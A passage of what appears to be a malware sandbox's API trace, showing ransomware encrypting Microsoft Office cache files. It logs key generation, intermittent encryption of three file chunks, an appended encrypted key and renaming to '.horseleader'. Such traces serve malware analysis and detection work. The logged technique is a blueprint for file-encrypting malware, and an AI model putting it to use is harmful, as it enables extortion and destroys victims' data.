nFileSizeLow=0x0, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0212.228] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0212.228] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\.") returned 81 [0212.228] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0212.228] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="..", cAlternateFileName="")) returned 1 [0212.228] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0212.228] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\..") returned 82 [0212.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0212.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0212.228] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0212.229] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="Windows") returned -1 [0212.229] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0212.229] StrStrIW (lpFirst="AccessMUI.msi", lpSrch=".horseleader") returned 0x0 [0212.229] lstrcmpW (lpString1="AccessMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0212.229] lstrcmpW (lpString1="AccessMUI.msi", lpString2="_uninstalling_.png") returned 1 [0212.229] lstrlenW (lpString=".testttjffg") returned 11 [0212.229] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", lpSrch=".testttjffg") returned 0x0 [0212.229] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0212.229] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0212.229] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0212.231] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0212.231] StrStrW (lpFirst="AccessMUI.msi", lpSrch=".txt") returned 0x0 [0212.231] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2517504) returned 1 [0212.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.231] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.233] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.234] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.234] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x130d00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.234] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.238] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x261a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.238] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.267] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.267] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.267] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.267] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0212.268] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0212.268] CloseHandle (hObject=0x158) returned 1 [0212.268] GetProcessHeap () returned 0x780000 [0212.268] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0212.268] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.horseleader") returned 105 [0212.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.horseleader")) returned 1 [0212.269] GetProcessHeap () returned 0x780000 [0212.269] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0212.269] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0212.269] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="Windows") returned -1 [0212.269] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0212.269] StrStrIW (lpFirst="AccessMUI.xml", lpSrch=".horseleader") returned 0x0 [0212.269] lstrcmpW (lpString1="AccessMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0212.269] lstrcmpW (lpString1="AccessMUI.xml", lpString2="_uninstalling_.png") returned 1 [0212.269] lstrlenW (lpString=".testttjffg") returned 11 [0212.269] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpSrch=".testttjffg") returned 0x0 [0212.269] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0212.270] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0212.270] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0212.271] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0212.271] StrStrW (lpFirst="AccessMUI.xml", lpSrch=".txt") returned 0x0 [0212.271] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1349) returned 1 [0212.271] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x545, lpOverlapped=0x0) returned 1 [0212.276] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffabb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.276] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x545, lpOverlapped=0x0) returned 1 [0212.276] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.276] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0212.276] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0212.276] CloseHandle (hObject=0x158) returned 1 [0212.277] GetProcessHeap () returned 0x780000 [0212.277] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0212.277] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.horseleader") returned 105 [0212.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.horseleader")) returned 1 [0212.278] GetProcessHeap () returned 0x780000 [0212.278] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0212.278] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="AccLR.cab", cAlternateFileName="")) returned 1 [0212.278] lstrcmpiW (lpString1="AccLR.cab", lpString2="Windows") returned -1 [0212.278] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0212.278] StrStrIW (lpFirst="AccLR.cab", lpSrch=".horseleader") returned 0x0 [0212.278] lstrcmpW (lpString1="AccLR.cab", lpString2="#Decrypt#.txt") returned 1 [0212.278] lstrcmpW (lpString1="AccLR.cab", lpString2="_uninstalling_.png") returned 1 [0212.278] lstrlenW (lpString=".testttjffg") returned 11 [0212.278] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpSrch=".testttjffg") returned 0x0 [0212.278] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0212.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0212.278] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0212.279] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0212.280] StrStrW (lpFirst="AccLR.cab", lpSrch=".txt") returned 0x0 [0212.280] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=28016276) returned 1 [0212.280] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.280] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.283] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd5974a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.283] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.288] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ab2e94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.289] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.300] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.300] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0212.300] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0212.300] CloseHandle (hObject=0x158) returned 1 [0212.692] GetProcessHeap () returned 0x780000 [0212.692] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0212.692] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.horseleader") returned 101 [0212.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.horseleader")) returned 1 [0212.693] GetProcessHeap () returned 0x780000 [0212.693] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0212.693] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0212.693] lstrcmpiW (lpString1="branding.xml", lpString2="Windows") returned -1 [0212.693] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0212.693] StrStrIW (lpFirst="branding.xml", lpSrch=".horseleader") returned 0x0 [0212.693] lstrcmpW (lpString1="branding.xml", lpString2="#Decrypt#.txt") returned 1 [0212.693] lstrcmpW (lpString1="branding.xml", lpString2="_uninstalling_.png") returned 1 [0212.693] lstrlenW (lpString=".testttjffg") returned 11 [0212.693] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpSrch=".testttjffg") returned 0x0 [0212.693] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0212.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0212.693] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0212.695] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0212.695] StrStrW (lpFirst="branding.xml", lpSrch=".txt") returned 0x0 [0212.695] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=596341) returned 1 [0212.695] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.695] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0213.811] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0213.812] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0213.812] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x464ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0213.812] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0215.260] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.260] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0215.260] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8c975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.260] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0215.263] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.263] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0215.263] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.264] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0215.264] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0215.264] CloseHandle (hObject=0x158) returned 1 [0215.264] GetProcessHeap () returned 0x780000 [0215.264] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0215.264] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 